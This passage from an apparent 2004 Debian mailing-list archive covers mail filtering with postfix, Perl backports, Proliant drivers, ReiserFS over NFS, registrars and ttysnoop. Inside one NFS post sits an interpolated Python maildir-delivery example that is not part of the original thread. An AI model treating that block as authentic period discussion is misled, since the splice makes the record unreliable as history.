> > that we saw under RH7.3 disappears.
> >
> > I see that Debian 3.0r2 includes a nicely aged (like fine cheese)
> > Linux 2.2 kernel.  While I'm certain the aging process only makes
> > its flavour stronger and more delectable, I'm afraid it's going to
> > choke at the thought of 10,000 threads.  Say nothing of 20,000.
> > Now I imagine it's not so difficult to simply compile a recent 2.4
> > (2.5?) kernel and go from there.  Is this fair?  Or would you
> > suppose that the current stable Debian is too old in other areas to
> > properly handle kernel 2.4?
> >
> > Even if I replace the kernel, I'm concerned that there's more
> > involved with the more efficient handling of threads from RH 7.3 to
> > RH 9 than just a kernel change -- I have to think there was a
> > significant rework of some libraries that made threads more
> > efficient under RH9 as well. Would anyone be able to identify
> > exactly what that re-working was, and conjecture if they think it
> > can be done under 3.0r2?  For that matter, would I at that point be
> > running so much new technology that I may as well be running an
> > unstable distribution of Debian?
> >
> > Finally, while I'm messing around with the kernel, I'd have to
> > include support for ext3fs.  In our environment, journaling is not
> > an option, it's a base requirement.  Of course replacing the kernel
> > would pretty much give me kernel-level support for it.  From that
> > point, how complicated is it to get the rest of the tools to play
> > nicely with ext3fs?  I'd imagine that a large set of tools would
> > need to be replaced, including e2fsck, mount, umount, etc.
> >
> > Thanks once again for all the info so far!
> >
> > -Fred Whipple
>
>




configure anomy sanitizer to drop not defang ?

2004-02-05 Thread Dan MacNeil

anomy sanitizer works well with postfix, but as far as I can tell, it
can't be configured to drop messages instead of defanging them.

I plan to configure sanitizer to add a tag to bad messages and then use
procmail to quarantine messages with that tag. Is there a better way?

Is there something that does what sanitizer does, works with postfix and allows
me to drop messages completely?

Mimedefang seems ideal, but it only works with sendmail.





Re: configure anomy sanitizer to drop not defang ?

2004-02-05 Thread Dan MacNeil

> What's wrong with sendmail?

Well, mostly that I've bought into the postfix fanboy propaganda that
postfix is superior for speed, security, ease of use and world peace.



##
On Thu, 5 Feb 2004, Lucas Albers wrote:

>
> Dan MacNeil said:
> >
> > anomy sanitizer works well with postfix, but as far as I can tell, it
> > can't be configured to drop messages instead of defanging them.
> >
> > I plan to configure sanitizer to add a tag to bad messages and then use
> > procmail to quarantine messages with that tag. Is there a better way?
> >
> > Is there something that does what sanitizer does, works with postfix and allows
> > me to drop messages completely?
> >
> > Mimedefang seems ideal, but it only works with sendmail.
>
> What's wrong with sendmail?
> I use it with mimedefang, and it works awesome.
> I can do spam filtering, greylisting, ptr-helo checking, virus scanning,
> extension filtering, mimetype-filtering, zipfile extension blocking, etc.
> The correct behavior with mimedefang is to generate a bounce for rejected
> spam, and discard for detected viruses. This is all at the 5xx level.
> You can also query internal mail servers/ldap servers to determine if an
> account exists before accepting mail from that sender or recipient.
> So you only accept mail from a sender, if that sender exists on one of
> your internal systems.
> My external mx is a debian sendmail 8.12.3, mimedefang 2.38 system and it
> handles all department mail load fine.
>




Re: How do you manage Perl modules?

2004-02-08 Thread Dan MacNeil

I'm in a similar situation; last night I installed spamassassin & razor from
backports.org. It seems to be working ok.

Fortunately for me, I don't have to worry about being forward compatible
with an existing Bayes db.

For you a (maybe painful) alternative to going to unstable is to discard
your older Bayes and automatic whitelist files.

Another alternative is to dump at least your whitelist to text, and then
script an import

btw, the first time you ran sa-learn did you get an error?

something like:

"whatsits_foo.a not in @INC --needed for Digest::SHA1"

I tried to make the problem go away with apt-get but got something like:

"blah is already the current version"

I succeeded in making the problem go away w/

/usr/bin/perl -MCPAN -e 'install Digest::SHA1'

#

On Sun, 8 Feb 2004, Craig Sanders wrote:

> On Fri, Feb 06, 2004 at 05:41:18PM -0500, Kris Deugau wrote:
> > However, I've just discovered that there's also a bad version mismatch
> > between the "default" libdb version used by DB_File in RedHat, and the one in
> > Debian (db3 in RedHat vs db1 [I think] in Debian).  I also discovered that
> > this has been included as a part of the monolithic perl-5.6.1 package, and I
> > *really* don't want to go anywhere near backporting that myself or using a
> > third-party backport.
> >
> > I discovered this in trying to get the SA2.63 install (from backports.org) to
> > recognize the ~40M global Bayes dbs and per-user AWL files;  instead I
> > discover pairs of .dir + .pag files for AWL (which I vaguely recall are an
> > artifact of db1) and SA won't open the existing bayes_* files.
>
> sounds like you've run into a reason to upgrade to unstable.
>
> you have three choices:
>
> 1. backport perl 5.8.x and libdb4 and all associated modules and other
>packages.
>
> 2. try to find a backports archive where someone else has done the same.
>
> 3. point sources.list at unstable and either 'apt-get install' perl and
>other packages, or 'apt-get dist-upgrade'.
>
> choice 1 is a lot of work.
>
> choice 2 doesn't really offer any benefits over just upgrading to 'unstable',
> or upgrading certain packages to their 'unstable' versions.
>
> choice 3 will result in the least problems, and will be better tested - there
> are far more people using unstable than there are using backports of perl.
>
> > Is there something like cpan2rpm or cpanflute for Debian?  I'd like to
> > pull in current versions of Perl modules
>
> dh-make-perl can fetch a package from CPAN and produce a working package that
> is good enough for local use (but not "polished" enough to upload to debian for
> re-distribution).
>
> > (or even just recompile the
> > stable version against different libs).
>
> this is always an option.  it's called 'back-porting'.  download the debianised
> source from unstable (along with any build dependencies) and build it.
>
>
> > I *could* hack together some bits to force db3 to work by building on
> > RedHat, and using alien to install... but that's just plain ugly and as
> > I've already discovered it *will* break because of differences in how
> > RedHat and Debian handle the core Perl install and addon modules.
>
> really, upgrading to 'unstable' will be the least-hassle option.
>
> 'unstable' means that the entire system is in flux, that it changes constantly.  it
> does not mean that the packages in it are unreliable.
>
> craig
>
> ps: i've been running ALL of my production servers on 'unstable' since 1995.
> i upgrade them semi-regularly.  no major problems.
>
>
>





Community Network $8000 contest

2004-02-08 Thread Dan MacNeil

I'm not affiliated with these folks but this $8000 contest may be of
interest to folks on this list. Feel free to pass this on to other lists,
this is the only list I'm sending it to.


#
Community Network Open Source Package Awards program

http://www.afcn.org/opensource/

[...]
A key service of most community networks (CNs) is providing
Internet-based services to community, civic, and nonprofit groups.
Community networks need an easy to install and easy to manage suite of
information services that has an integrated and easy to use Web interface,
so that volunteers and staff who are not Unix experts can set up,
configure, and support service packages for local civic and community
groups.

With financial support from its partner, the University of Baltimore
School of Information Arts and Technologies, the Association For Community
Networking offers two awards of $4000 each for the Open Source-based
service packages that most successfully meet all of the specifications
outlined below. The two awards are designed to meet the needs of most
community networks.





web control panel|vpopmail / Tequila / courier / openLDAP / postfix

2004-03-01 Thread Dan MacNeil

We're getting enough domains and email accounts that doing things by hand
is getting to be a pain (even with some scripts).

We'd like to give our users a web control panel to handle email account
administration for their own domains.

We use:
Postfix
Courier-pop/imap
Squirrelmail
procmail
sanitizer/f-prot
spamassassin
openLDAP (soon)

Tequila seems almost perfect but it is in beta.

http://www.holgilein.de/coolprox/tequila/

There are testing packages for vpopmail but it seems to require putting
qmail into the mix.

http://www.inter7.com/vpopmail/postfix.txt

What are your experiences with these or other software libre web control
panels?






Re: debian on HP proliant

2004-04-17 Thread Dan MacNeil

> The installer from woody has built-in support for the cciss controller
> on at least the Proliant DL 580 G2.

> It works smoothly, but lacks support for the default installed 3com
> gig-ethernet adapter (tg3 driver), once installed,

The network installer for sarge detects the tg3 gig-ethernet adaptor
automagically. --We're moving to Sarge now.


On Fri, 16 Apr 2004, Jose Alberto Guzman wrote:

> Nathan Eric Norman wrote:
> > On Fri, Jan 16, 2004 at 10:33:09AM -0500, Eric Sproul wrote:
> >
> >>On Fri, 2004-01-16 at 10:15, Francis Tyers wrote:
> >>
> >>>The onboard 'scsi' controller appears as a block device and not as a
> >>>scsi device under linux.
> >>>
> >>>01:03.0 RAID bus controller: Compaq Computer Corporation Smart Array
> >>>5i/532 (rev 01)
> >>>
> >>>i think it is...
> >>>
> >>>there is a driver in linux 2.4.x...
> >>
> >>The driver is called cciss, and supports the built in SmartArray
> >>controller as well as the higher-end optional RAID controllers like the
> >>641/642.
> >>
> >>Look in /proc/driver/cciss/ccissX (where X is the controller number,
> >>usually '0' for the built-in) for some basic info.
> >>
> >>Devices attached to these controllers appear as /dev/cciss/cXdXpX
> >>
> >>c=controller #
> >>d=logical drive #
> >>p=partition #
> >>
> >>Thus the first partition on the first logical drive on the built-in
> >>controller is /dev/cciss/c0d0p1.
> >
> >
> > Is anyone aware of a debian-installer image which supports cciss built
> > in?  The existing d-i supports cciss just fine, but as a module.
> >
>
>   The installer from woody has built-in support for the cciss controller
> on at least the Proliant DL 580 G2.
>
>   It works smoothly, but lacks support for the default installed 3com
> gig-ethernet adapter (tg3 driver), once installed, I usually either copy
> a recent kernel source and compile whatever I need, or install an
> eepro100 (or other supported) card to finish.
>
>   The trick is to install with the bf24 kernel:  version 2.4.18.
>
>   Check the help at the Woody CD install boot prompt.
>
>
> José
>
>
> PS.
> please reply to the list
>
>
>




ReiserFS via NFS

2004-04-17 Thread Dan MacNeil

I've just converted from mbox to maildir

Right now there are some users with 500 files in a directory; I expect
this figure to grow. ReiserFS is looking good.

The benefits of running a central storage server and a bunch of separate
web/smtp/pop3/spamfiltering/ftp servers, with the storage server running not
much more than NFS and all connected with a cheap Gigabit switch, are also
appealing to me.

Is there any benefit to ReiserFS if I am accessing it via NFS?






Re: ReiserFS via NFS

2004-04-17 Thread Dan MacNeil

On Sat, 17 Apr 2004, Michelle Konzack wrote in part:

>But use a self-compiled Linux with nfs and nfsd compiled WITH
>"TCP" and "v3" support.

>if you mount your server add "nfsvers=3,tcp" to it otherwise it
>will use UDP which is realy not good.

Why? From my (maybe wrong?) reading of the docs, the advantage of TCP is
that it is hard to spoof given that it is connection oriented.

I plan to run NFS on a completely internal network and configure iptables
to drop packets from outside the network. The NFS server will not be
connected to the outside world and the application servers will have 2
NICs one for the internal Gb/sec 10.0.0.* network and one for the outside
world.

 Andrew Miehs writes in part:

> I suggest you all read
> http://www.porcupine.org/postfix-mirror/newdoc/NFS_README.html

> Especially when it comes to mail. With Maildir you will have less
> problems than with mbox, but you still do NOT have atomic transactions,
> and as such you will at some stage statistically have a problem.

Porcupine says in part:
[emphasis added]

> switch to maildir style, which needs *no* application-level lock
> controls).


Other people say:

>[DONT USE NFS FOR MAIL OR YOUR PRIVATE PARTS WILL
>  BE EATEN BY GOLD FISH]

See: the spec for maildir
http://www.qmail.org/man/man5/maildir.html

I can't say I've ever seen a convincing argument against maildir's
safety...

Am I right in that nobody on the list knows whether or not any advantage
to running ReiserFS is swallowed by NFS?
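As an added example (not code from this thread, the qmail man page, Postfix or Courier), here is the tmp/ then new/ delivery step the maildir spec describes, which is why maildir needs no application-level locks and is the safer choice over mbox on NFS. The hostname encoding follows my reading of the spec; the exact unique-name layout and the use of a temporary directory are this example's own choices.

```python
import itertools, os, socket, tempfile, time

_seq = itertools.count()  # per-process delivery counter for the unique name

def maildir_create(path):
    """Create the three maildir subdirectories tmp/, new/ and cur/."""
    for sub in ("tmp", "new", "cur"):
        os.makedirs(os.path.join(path, sub), exist_ok=True)
    return path

def unique_name():
    # time.pid.host as the spec requires; microseconds and a counter in the
    # middle field keep two deliveries in one second apart. The host part is
    # what separates writers on different NFS clients; per the spec, '/' and
    # ':' in the hostname are encoded as \057 and \072.
    host = socket.gethostname().replace("/", "\\057").replace(":", "\\072")
    now = time.time()
    return "%d.M%06dP%d_%d.%s" % (now, (now % 1) * 1e6, os.getpid(), next(_seq), host)

def deliver(maildir, raw_message):
    """Write raw_message into maildir/new/ without taking any lock."""
    name = unique_name()
    tmp_path = os.path.join(maildir, "tmp", name)
    new_path = os.path.join(maildir, "new", name)
    # "x" mode fails if the tmp name already exists (the spec's stat() check);
    # the file is written and fsync'd while it is still invisible to readers.
    with open(tmp_path, "xb") as f:
        f.write(raw_message)
        f.flush()
        os.fsync(f.fileno())
    # One atomic rename makes the complete file appear in new/, so a reader
    # never sees a partial message and no application-level lock is needed.
    # (The spec's link() into new/ followed by unlink() of tmp/ has the same effect.)
    os.rename(tmp_path, new_path)
    return name

def new_messages(maildir):
    """Names waiting in new/, sorted (what a reader would pick up)."""
    return sorted(os.listdir(os.path.join(maildir, "new")))

def leftover_tmp(maildir):
    """Anything left in tmp/ is an interrupted delivery; readers ignore it."""
    return os.listdir(os.path.join(maildir, "tmp"))

def demo():
    """Deliver two constructed messages into a fresh temporary maildir."""
    box = maildir_create(tempfile.mkdtemp(prefix="maildir-demo-"))
    return box, [deliver(box, b"Subject: one\n\nfirst\n"),
                 deliver(box, b"Subject: two\n\nsecond\n")]
```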





domain registrar recommendation?

2004-04-29 Thread Dan MacNeil

Right now most of our domains are registered with register.com, support is
good, they provide DNS but... $35 per domain per year is pretty steep.

Eventually we'd like to be our own registrar or to use a domain wholesaler
like:

http://resellers.tucows.com/

From other lists, OpenSRS/tucows seems pretty good but right now we aren't
adding 25 domains a year, which is apparently the break-even point.

Can anyone recommend a registrar?

Criteria in order of importance are:

0) Business integrity (no network solutions please)
1) Almost perfect uptime
2) Ease of administration/support
3) price
4) Ease of transferring domains to us when we become a registrar.




ttysnoop openssh woody

2004-06-27 Thread Dan MacNeil

Does anyone have a recipe for getting ttysnoop working with openssh on
woody w/o recompiling openssh?

This guide:

http://64.233.161.104/search?q=cache:ieeFRmtUJ-AJ:www.forty-two.nl/documentation/HOWTOOPENSSHwithTTYSNOOP.pdf+ttysnoop/++ssh+snooptab++login+program&hl=en&lr=lang_en

...will do it but I am too lazy to recompile openssh.

The primary goal is collaboration not spying, so I could set up telnet
limited to localhost & follow the fine man, but this seems an extra
step...